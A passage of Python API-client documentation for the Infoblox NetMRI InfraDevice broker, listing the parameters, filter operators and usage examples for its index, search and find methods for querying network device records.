:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_devices: An array of the InfraDevice objects that match the specified input criteria.
:rtype infra_devices: Array of InfraDevice
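
**Example**

A minimal usage sketch (hypothetical host and credentials; assumes the broker is obtained from an authenticated InfobloxNetMRI client of this package)::

    from infoblox_netmri.client import InfobloxNetMRI

    client = InfobloxNetMRI(host="netmri.example.com",
                            username="admin",
                            password="password")
    broker = client.get_broker("InfraDevice")
    # First page of infra devices, sorted by name, selected attributes only.
    devices = broker.index(limit=10,
                           sort=["DeviceName"],
                           select=["DeviceID", "DeviceName", "DeviceIPDotted"])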
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available infra devices matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceAddlInfo: Additional information about the device; IP phones will contain the extension in this field.
:type DeviceAddlInfo: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceAddlInfo: Additional information about the device; IP phones will contain the extension in this field.
:type DeviceAddlInfo: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceAssurance: The assurance level of the device type value.
:type DeviceAssurance: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceAssurance: The assurance level of the device type value.
:type DeviceAssurance: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceConfigLastCheckedTime: The date/time of the last attempted retrieval of the device's configuration file.
:type DeviceConfigLastCheckedTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceConfigLastCheckedTime: The date/time of the last attempted retrieval of the device's configuration file.
:type DeviceConfigLastCheckedTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceConfigTimestamp: The date/time the configuration file was last successfully retrieved for this device.
:type DeviceConfigTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceConfigTimestamp: The date/time the configuration file was last successfully retrieved for this device.
:type DeviceConfigTimestamp: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceContextName: The name of the virtual context of this virtual device.
:type DeviceContextName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceContextName: The name of the virtual context of this virtual device.
:type DeviceContextName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceDNSName: The device name as reported by DNS.
:type DeviceDNSName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceDNSName: The device name as reported by DNS.
:type DeviceDNSName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceMAC: The MAC of the interface corresponding to the management IP, if available. Otherwise, it is the lowest numbered non-zero MAC for any interface on the device. If no interface records are available for the device, the lowest non-zero MAC address corresponding to the management IP address found in the global ARP table will be used.
:type DeviceMAC: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceMAC: The MAC of the interface corresponding to the management IP, if available. Otherwise, it is the lowest numbered non-zero MAC for any interface on the device. If no interface records are available for the device, the lowest non-zero MAC address corresponding to the management IP address found in the global ARP table will be used.
:type DeviceMAC: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceModel: The device model name.
:type DeviceModel: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceModel: The device model name.
:type DeviceModel: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceNetBIOSName: The NetBIOS name of the device.
:type DeviceNetBIOSName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceNetBIOSName: The NetBIOS name of the device.
:type DeviceNetBIOSName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceOUI: The NetMRI-determined device vendor using OUI.
:type DeviceOUI: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceOUI: The NetMRI-determined device vendor using OUI.
:type DeviceOUI: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DevicePolicyScheduleMode: Not currently used.
:type DevicePolicyScheduleMode: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DevicePolicyScheduleMode: Not currently used.
:type DevicePolicyScheduleMode: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRunningConfigLastChangedTime: The date/time, as reported by SNMP, that the device's running configuration was last changed.
:type DeviceRunningConfigLastChangedTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRunningConfigLastChangedTime: The date/time, as reported by SNMP, that the device's running configuration was last changed.
:type DeviceRunningConfigLastChangedTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSAAVersion: The SAA version running on this device.
:type DeviceSAAVersion: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSAAVersion: The SAA version running on this device.
:type DeviceSAAVersion: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSavedConfigLastChangedTime: The date/time, as reported by SNMP, that the device's saved configuration was last changed.
:type DeviceSavedConfigLastChangedTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSavedConfigLastChangedTime: The date/time, as reported by SNMP, that the device's saved configuration was last changed.
:type DeviceSavedConfigLastChangedTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysContact: The Device sysContact as reported by SNMP.
:type DeviceSysContact: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysContact: The Device sysContact as reported by SNMP.
:type DeviceSysContact: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysDescr: The device sysDescr as reported by SNMP.
:type DeviceSysDescr: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysDescr: The device sysDescr as reported by SNMP.
:type DeviceSysDescr: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysLocation: The device sysLocation as reported by SNMP.
:type DeviceSysLocation: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysLocation: The device sysLocation as reported by SNMP.
:type DeviceSysLocation: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysName: The device name as reported by SNMP.
:type DeviceSysName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysName: The device name as reported by SNMP.
:type DeviceSysName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceUniqueKey: Unique key which allows detecting duplicates across different Virtual Networks.
:type DeviceUniqueKey: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceUniqueKey: Unique key which allows detecting duplicates across different Virtual Networks.
:type DeviceUniqueKey: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceVendor: The device vendor name.
:type DeviceVendor: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceVendor: The device vendor name.
:type DeviceVendor: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceVersion: The device OS version.
:type DeviceVersion: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceVersion: The device OS version.
:type DeviceVersion: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param FilterProvisionData: Internal data - do not modify, may change without warning.
:type FilterProvisionData: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterProvisionData: Internal data - do not modify, may change without warning.
:type FilterProvisionData: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param FilteringInd: A flag indicating whether this device is eligible for Security Device Controller.
:type FilteringInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilteringInd: A flag indicating whether this device is eligible for Security Device Controller.
:type FilteringInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceChangedCols: The fields that changed between this revision of the record and the previous revision.
:type InfraDeviceChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceChangedCols: The fields that changed between this revision of the record and the previous revision.
:type InfraDeviceChangedCols: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type InfraDeviceEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type InfraDeviceEndTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceStartTime: The starting effective time of this revision of the record.
:type InfraDeviceStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceStartTime: The starting effective time of this revision of the record.
:type InfraDeviceStartTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceTimestamp: The date and time this record was collected.
:type InfraDeviceTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceTimestamp: The date and time this record was collected.
:type InfraDeviceTimestamp: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param MgmtServerDeviceID: The Device ID of the management server for the device.
:type MgmtServerDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param MgmtServerDeviceID: The Device ID of the management server for the device.
:type MgmtServerDeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NetworkDeviceInd: A flag indicating whether this device is a network device or an end host.
:type NetworkDeviceInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkDeviceInd: A flag indicating whether this device is a network device or an end host.
:type NetworkDeviceInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RoutingInd: A flag indicating whether this device is configured with any routing capability and whether a routing table was retrieved from this device.
:type RoutingInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RoutingInd: A flag indicating whether this device is configured with any routing capability and whether a routing table was retrieved from this device.
:type RoutingInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SwitchingInd: A flag indicating whether a switch port forwarding table was retrieved from this device.
:type SwitchingInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SwitchingInd: A flag indicating whether a switch port forwarding table was retrieved from this device.
:type SwitchingInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualInd: A flag indicating if the source device is a virtual device.
:type VirtualInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualInd: A flag indicating if the source device is a virtual device.
:type VirtualInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualNetworkingInd: Set to null, 0 or 1. 0 indicates this is not a VRF-aware device; 1 indicates it is VRF-aware.
:type VirtualNetworkingInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualNetworkingInd: Set to null, 0 or 1. 0 indicates this is not a VRF-aware device; 1 indicates it is VRF-aware.
:type VirtualNetworkingInd: Array of Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the infra devices as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit parameter for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceID
:param sort: The data field(s) to use for sorting the output. Default is DeviceID. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each InfraDevice. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against infra devices, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: DataSourceID, DeviceAddlInfo, DeviceAssurance, DeviceConfigLastCheckedTime, DeviceConfigTimestamp, DeviceContextName, DeviceDNSName, DeviceFirstOccurrenceTime, DeviceID, DeviceIPDotted, DeviceIPNumeric, DeviceMAC, DeviceModel, DeviceName, DeviceNetBIOSName, DeviceOUI, DevicePolicyScheduleMode, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSAAVersion, DeviceSavedConfigLastChangedTime, DeviceSysContact, DeviceSysDescr, DeviceSysLocation, DeviceSysName, DeviceType, DeviceUniqueKey, DeviceVendor, DeviceVersion, FilterProvisionData, FilteringInd, InfraDeviceChangedCols, InfraDeviceEndTime, InfraDeviceStartTime, InfraDeviceTimestamp, MgmtServerDeviceID, NetworkDeviceInd, ParentDeviceID, RoutingInd, SwitchingInd, VirtualInd, VirtualNetworkID, VirtualNetworkingInd.
:type query: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Note that this kind of filter may be costly and inefficient if not combined with database-level filtering.
:type xml_filter: String
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag to indicate whether discovery times should be included or not.
:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_devices: An array of the InfraDevice objects that match the specified input criteria.
:rtype infra_devices: Array of InfraDevice
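
**Example**

A sketch of a containment search (hypothetical values; the broker is obtained as in the index example)::

    # Records whose searched attributes contain "core", limited to one vendor,
    # newest first-occurrence first.
    matches = broker.search(query="core",
                            DeviceVendor=["Cisco"],
                            sort=["DeviceFirstOccurrenceTime"],
                            dir=["desc"])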
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available infra devices matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: DataSourceID, DeviceAddlInfo, DeviceAssurance, DeviceConfigLastCheckedTime, DeviceConfigTimestamp, DeviceContextName, DeviceDNSName, DeviceFirstOccurrenceTime, DeviceID, DeviceIPDotted, DeviceIPNumeric, DeviceMAC, DeviceModel, DeviceName, DeviceNetBIOSName, DeviceOUI, DevicePolicyScheduleMode, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSAAVersion, DeviceSavedConfigLastChangedTime, DeviceSysContact, DeviceSysDescr, DeviceSysLocation, DeviceSysName, DeviceType, DeviceUniqueKey, DeviceVendor, DeviceVersion, FilterProvisionData, FilteringInd, InfraDeviceChangedCols, InfraDeviceEndTime, InfraDeviceStartTime, InfraDeviceTimestamp, MgmtServerDeviceID, NetworkDeviceInd, ParentDeviceID, RoutingInd, SwitchingInd, VirtualInd, VirtualNetworkID, VirtualNetworkingInd.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceAddlInfo: The operator to apply to the field DeviceAddlInfo. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceAddlInfo: Additional information about the device; IP phones will contain the extension in this field. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceAddlInfo: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceAddlInfo: If op_DeviceAddlInfo is specified, the field named in this input will be compared to the value in DeviceAddlInfo using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceAddlInfo must be specified if op_DeviceAddlInfo is specified.
:type val_f_DeviceAddlInfo: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceAddlInfo: If op_DeviceAddlInfo is specified, this value will be compared to the value in DeviceAddlInfo using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceAddlInfo must be specified if op_DeviceAddlInfo is specified.
:type val_c_DeviceAddlInfo: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceAssurance: The operator to apply to the field DeviceAssurance. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceAssurance: The assurance level of the device type value. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceAssurance: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceAssurance: If op_DeviceAssurance is specified, the field named in this input will be compared to the value in DeviceAssurance using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceAssurance must be specified if op_DeviceAssurance is specified.
:type val_f_DeviceAssurance: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceAssurance: If op_DeviceAssurance is specified, this value will be compared to the value in DeviceAssurance using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceAssurance must be specified if op_DeviceAssurance is specified.
:type val_c_DeviceAssurance: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceConfigLastCheckedTime: The operator to apply to the field DeviceConfigLastCheckedTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceConfigLastCheckedTime: The date/time of the last attempted retrieval of the device's configuration file. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceConfigLastCheckedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceConfigLastCheckedTime: If op_DeviceConfigLastCheckedTime is specified, the field named in this input will be compared to the value in DeviceConfigLastCheckedTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceConfigLastCheckedTime must be specified if op_DeviceConfigLastCheckedTime is specified.
:type val_f_DeviceConfigLastCheckedTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
